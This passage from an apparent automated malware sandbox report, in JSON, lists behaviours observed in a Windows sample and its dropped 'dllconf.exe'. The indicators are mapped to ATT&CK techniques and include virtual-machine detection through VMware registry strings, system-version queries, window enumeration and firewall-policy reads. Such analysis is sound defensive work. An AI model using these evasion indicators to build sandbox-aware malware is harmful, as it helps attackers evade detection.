\"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100009f18cd7551cbcfc000000000e0c2f67500b0fd7f8dcacfc07cee12000000000078ff1200bd06cf75f58710b5feffffff7cbdcd7502dff675ffffffff000000000000000020df400040f11200000000000000000048f112004cf11200e3084100000000000000000020df400040f11200 (UID: 00000000-00005392)\n \"dllconf.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005392)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"OpenMutexA\" with parameter \"Aeb-75\" - (UID: 00000000-00005056)\n \"dllconf.exe\" called \"OpenMutexA\" with parameter \"Aeb-75\" - (UID: 00000000-00005068)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-193", "type": 2, "relevance": 1, "name": "Contains ability to query volume/memory size (API string)", "description": "Found reference to API \"GlobalMemoryStatus\" (Indicator: \"GlobalMemoryStatus\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GlobalMemoryStatus\" (Indicator: \"GlobalMemoryStatus\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"11861984953,5108,110,,EnumWindows,user32.dll,\"252:21:57.873\",RX=0,PX=0\" (Indicator: \"enumwindows\"; Source: \"00000000-00005056.00000000.139963.00640000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"dllconf.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"dllconf.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"LEVELS\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"DEFAULTLEVEL\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"SAFERFLAGS\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"POLICYSCOPE\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"LOGFILENAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-668", "type": 2, "relevance": 1, "name": "Able to identify virtual environment using sandbox registry", "description": "Found string \"SOFTWARE\\VMware, Inc.\\VMware Tools\" (Indicator: \"software\\vmware, inc.\\vmware tools\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"SOFTWARE\\VMware, Inc.\\VMware Tools\" (Indicator: \"software\\vmware, inc.\\vmware tools\"; Source: \"00000000-00005056.00000000.139963.00423000.00000040.mdmp\")\n Found string \"SOFTWARE\\VMware, Inc.\\VMware Tools\" (Indicator: \"software\\vmware, inc.\\vmware tools\"; Source: \"00000000-00005068.00000000.140099.00423000.00000040.mdmp, 00000000-00005068.00000001.140461.00423000.00000040.mdmp\")\n Found string \"SOFTWARE\\VMware, Inc.\\VMware Tools\" (Indicator: \"software\\vmware, inc.\\vmware tools\"; Source: \"00000000-00005392.00000000.140409.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005644)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000003b0000002300000023000000000000000000000040f11200000000000000000020df400000000000586cc6771b00000000020000f0ff8e01230000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000eceb1200000000008e0000003cec1200feffffffc4eb1200cf00c877d600c8775157fc778e000000470000003cec12000000000098eb12000000000000ec1200 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000690018006900130069000000000000000000000064000000000164d2120000000000c8df120095e1c377bdae2900feffffff435cc7775059c777aa000000b80000001200690010006900ecd3120024d8120000000000000000000000640000000009acd21200000000003cd4120095e1c3771c5cc67760d8cd75ffffffff170000009cd3120024000000030000008cd81200b8dd120024d8120086000000c8d3120096edc7773a006900a06a9d7586000000ecd3120024d812000000000086008800a06a9d75ecd31200916c9d753a006900a06a9d75a06a9d755cd8120002020000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600fd65cdc6accc12006d82f976ac8b6a0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000360066006100370033003300360032003500630066003800350033003500660031006100310061003900630036003700300034003900340031003200320034006100370062003500650063006200310038006400380065003000660065006400330033002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bc777cd0bfc77d8eb6777ac01640000006400000000000000000016008e009d04000000000000000000000000000000000000170089009d04000000000000000000000870640000000000200000000000000000000000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f97634096e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f9762c126e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006e00f83b0000ff0700000000640060d06c007f07000060d06c00d82f6400d1120000f8c5120067e5c4770000640058196e0000000000000064000000000058196e00000000007d12006f80000000001c6e0060d06c00684d6c00003b0000000064000000000058196e00601500000000640050166e00f83b0000ff0700000000640060d06c007f07000060d06c007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f976d4136e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006e00f83b0000ff0700000000640060d06c007f07000060d06c00d82f64009c120000f8c5120067e5c47700006400001b6e00000000000000640000000000001b6e00000000004812005a80000000a81d6e0060d06c00f04c6c00003b00000000640000000000001b6e006015000000006400f8176e00f83b0000ff0700000000640060d06c007f07000060d06c007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f97604156e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006e00f83b0000ff0700000000640060d06c007f07000060d06c00d82f640076120000f8c5120067e5c47700006400301c6e00000000000000640000000000301c6e00000000002212003080000000d81e6e0060d06c00f04c6c00003b00000000640000000000301c6e00601500000000640028196e00f83b0000ff0700000000640060d06c007f07000060d06c007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f97634166e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006e00f83b0000ff0700000000640060d06c007f07000060d06c00d82f640050120000f8c5120067e5c47700006400601d6e00000000000000640000000000601d6e0000000000fc1100ed8000000008206e0060d06c00f04c6c00003b00000000640000000000601d6e006015000000006400581a6e00f83b0000ff0700000000640060d06c007f07000060d06c007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f9765c176e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006e00f83b0000ff0700000000640060d06c007f07000060d06c00d82f64002b120000f8c5120067e5c47700006400881e6e00000000000000640000000000881e6e0000000000d71100c68000000030216e0060d06c00f04c6c00003b00000000640000000000881e6e006015000000006400801b6e00f83b0000ff0700000000640060d06c007f07000060d06c007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f9768c186e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006e00f83b0000ff0700000000640060d06c007f07000060d06c00d82f640005120000f8c5120067e5c47700006400b81f6e00000000000000640000000000b81f6e0000000000b11100a08000000060226e0060d06c00f04c6c00003b00000000640000000000b81f6e006015000000006400b01c6e00f83b0000ff0700000000640060d06c007f07000060d06c007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f976bc196e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006e00f83b0000ff0700000000640060d06c007f07000060d06c00d82f6400df110000f8c5120067e5c47700006400e8206e00000000000000640000000000e8206e00000000008b11009a8000000090236e0060d06c00f04c6c00003b00000000640000000000e8206e006015000000006400e01d6e00f83b0000ff0700000000640060d06c007f07000060d06c007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f976e4226e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006e00f83b0000ff0700000000640060d06c007f07000060d06c00d82f6400ba100000f8c5120067e5c47700006400102a6e00000000000000640000000000102a6e00000000006610007680000000b82c6e0060d06c00f04c6c00003b00000000640000000000102a6e00601500000000640008276e00f83b0000ff0700000000640060d06c007f07000060d06c007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600196fcdc688c612006d82f9761c246e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000907a6c00c8cf1200b344936a81d03d76000000000000000000000000000000000000000000000000c00200000000000000000000000000000566cdc68824cfc684d412005ecb3b76c002000000000000005d3976e0d612000e5d397678d21200dcaa3d76010000000000000072000000ffffffffffffffff00d0120078020000000000002500000000d012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036004979cdc658d012006d82f9762c496e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff0300de0070005700620b3b7600000000087064000000000050000000ac216e000200000000c96600000000000100000828316c0030746400380b3b768cce12000200000040cf12003f08f7750200000000c96600000000000100001888fbf67530cf1200c81c3d7606d1120095fbf67564d0120000c96600000000000000000000000000eccf1200000064007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600fd66cdc6accf12006d82f9762c496e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d561cdc6c4c812006d82f9760c4d6e0004010000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006400581e6d00000000003e00003e340000c080206d00f8236d0010506e00f00100000000640004000000581e6d00fcda12000464c77738016400e063c7776966fc770000000000006400601e6d006dd1f6756a1ecac66cae1c77000000000000000018030000f8236d00d82f64000100000000006400500164000c000000601e6d00d82f6400020000021800000090150085820000000000000000000000030000009cda1200820000007f070000000000000022002202000000c075fe75e8af6e0000000000c075fe75b8da1200e830640000000000d82f640010db1200ff2bc777 (UID: 00000000-00005056)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00005056)\n \"dllconf.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00005068)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"IsWow64Process\" with parameter \"5056\" - (UID: 00000000-00005056)\n \"dllconf.exe\" called \"IsWow64Process\" with parameter \"5068\" - (UID: 00000000-00005068)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"dllconf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-415", "type": 2, "relevance": 1, "name": "Found registry location string related to firewall policy", "description": "Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005056.00000000.139963.00423000.00000040.mdmp\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005056.00000000.139963.00423000.00000040.mdmp\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005068.00000000.140099.00423000.00000040.mdmp, 00000000-00005068.00000001.140461.00423000.00000040.mdmp\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005068.00000000.140099.00423000.00000040.mdmp, 00000000-00005068.00000001.140461.00423000.00000040.mdmp\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005392.00000000.140409.00423000.00000040.mdmp\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005392.00000000.140409.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005056)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetWindowTextA\" (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetWindowTextA\" with parameter \"CiceroUIWndFrame\" - (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetWindowTextA\" with parameter \"Start\" - (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetWindowTextA\" with parameter \"Network Flyout\" - (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetWindowTextA\" with parameter \"Task Switching\" - (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetWindowTextA\" with parameter \"Start menu\" - (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetWindowTextA\" with parameter \"TF_FloatingLangBar_WndTitle\" - (UID: 00000000-00005056)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005056)\n \"dllconf.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005068)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2585.BAT\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2585.BAT\")\n \"dllconf.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2908.BAT\")\n \"dllconf.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2908.BAT\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-237", "type": 2, "relevance": 1, "name": "Contains ability to retrieve event logs (API string)", "description": "Found reference to API \"OpenEventLogA\" (Indicator: \"OpenEventLog\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n 